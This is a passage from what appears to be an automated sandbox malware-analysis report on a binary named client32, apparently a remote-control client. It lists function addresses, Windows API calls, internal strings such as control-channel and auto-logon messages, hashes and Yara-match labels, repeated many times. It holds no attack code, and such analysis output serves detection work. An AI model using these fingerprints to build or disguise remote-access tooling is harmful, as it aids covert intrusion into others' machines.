                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterException@8SectionThrowXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                                                                                                    • String ID: NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                                                                                                                    • API String ID: 2637870501-623348194
                                                                                                                                                                                                    • Opcode ID: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
                                                                                                                                                                                                    • Instruction ID: 57dd9297704c65ab0c6bcb40d8263c5768676fb733a16b5b2db7577f0494a42a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B87181B5D00359DFEB10CFA4C884BDDFBB4AF05318F248159D825AB381EB75AA84CB91
                                                                                                                                                                                                    Function 11021250 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$VisibleWindow
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d
                                                                                                                                                                                                    • API String ID: 1671172596-1913222166
                                                                                                                                                                                                    • Opcode ID: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
                                                                                                                                                                                                    • Instruction ID: 343a7c5902a362ececb8f7ca127abed5b4c5d2d50e5eb0de1d2da9fabf51934b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17519C74B00215AFD710CB68CC80FAAB7F9AF88704F508698E6599B281CB70ED45CBA1
                                                                                                                                                                                                    Function 110354B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110354BF
                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00035030), ref: 110354FC
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 11033760: IsWindow.USER32(?), ref: 11033768
                                                                                                                                                                                                      • Part of subcall function 11033760: GetWindowLongA.USER32(?,000000F0), ref: 1103377B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
                                                                                                                                                                                                    • String ID: CltAutoLogon.cpp$IsWindow(hDia)
                                                                                                                                                                                                    • API String ID: 2743442841-2884807542
                                                                                                                                                                                                    • Opcode ID: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
                                                                                                                                                                                                    • Instruction ID: 266056e39768e9626d6b00a12ef6d260c21a84dff935472d76ead0117b905fd9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3241CFB5E207059FC720DF24C991B9AB7F6BF8071AF50846DD84687AA0EB32F544CB91
                                                                                                                                                                                                    Function 11039390 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _strtok.LIBCMT ref: 110393B2
                                                                                                                                                                                                      • Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804
                                                                                                                                                                                                    • _strtok.LIBCMT ref: 11039433
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
                                                                                                                                                                                                    • String ID: ; >$CLTCONN.CPP
                                                                                                                                                                                                    • API String ID: 3120919156-788487980
                                                                                                                                                                                                    • Opcode ID: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
                                                                                                                                                                                                    • Instruction ID: 48fd02c5cc66f23834ff9d805c81fd3cb0a4cfabe792bc6ab9c015f56f8a8e7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4821E775F1425B6BD701CEA58C40F9AB6D49F85359F0440A5FE08DB380FAB4AD0183D2
                                                                                                                                                                                                    Function 11031170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(24DE4E77,00000000,?,24DE4E77,1118736B,000000FF,?,11066188,NSMWClass,24DE4E77,?,1106DC18), ref: 110311AA
                                                                                                                                                                                                    • __strdup.LIBCMT ref: 110311F5
                                                                                                                                                                                                      • Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,24DE4E77,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                                                                                      • Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                                                                                      • Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                                                                                      • Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
                                                                                                                                                                                                    • String ID: NSMWClass$NSMWClassVista
                                                                                                                                                                                                    • API String ID: 319803333-889775840
                                                                                                                                                                                                    • Opcode ID: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
                                                                                                                                                                                                    • Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750
                                                                                                                                                                                                    Function 110A95C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateWindowExA.USER32(80000000,SysListView32,11190240,?,?,?,?,00000000,80000000,?,00000000,00000000), ref: 110A9628
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                    • String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
                                                                                                                                                                                                    • API String ID: 716092398-3171529584
                                                                                                                                                                                                    • Opcode ID: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
                                                                                                                                                                                                    • Instruction ID: 47062bfc9542a2c6c353129ffb0ec6f2ada6c6bd4fa77e90f028d1fc367f12b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74218E7960020AAFDB14DF59DC81FDBBBE9AF88314F10861DF95987281DB74E941CBA0
                                                                                                                                                                                                    Function 11063300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strtok
                                                                                                                                                                                                    • String ID: ,=
                                                                                                                                                                                                    • API String ID: 1675499619-2677018336
                                                                                                                                                                                                    • Opcode ID: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
                                                                                                                                                                                                    • Instruction ID: feda1c23a4deb0c6415e8fc3f525424d3758ff44d9e037eb8c71fca6166ea7b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7111C266E0866B1FEB41CE699C11BCBB7D85F06259F04C0D5F95C9B341EA20F801C6E2
                                                                                                                                                                                                    Function 1114F010 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 1114F04C
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 1114F086
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                                                                                                                    • API String ID: 6605023-1396654219
                                                                                                                                                                                                    • Opcode ID: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
                                                                                                                                                                                                    • Instruction ID: df32f2f24868e4b0a831f81203bc5965ced63257c83ed47365b8bb2cf1ea103c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37112976C0116677C3118E2D9D88E8BFF69EB81A68F248125FC9817741F731A61087E2
                                                                                                                                                                                                    Function 110EB400 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __itow.LIBCMT ref: 110EB422
                                                                                                                                                                                                      • Part of subcall function 11160BD9: _xtoa@16.LIBCMT ref: 11160BF9
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11190240,?,?,?,?,?,?,110FCFEA), ref: 110EB447
                                                                                                                                                                                                    Strings
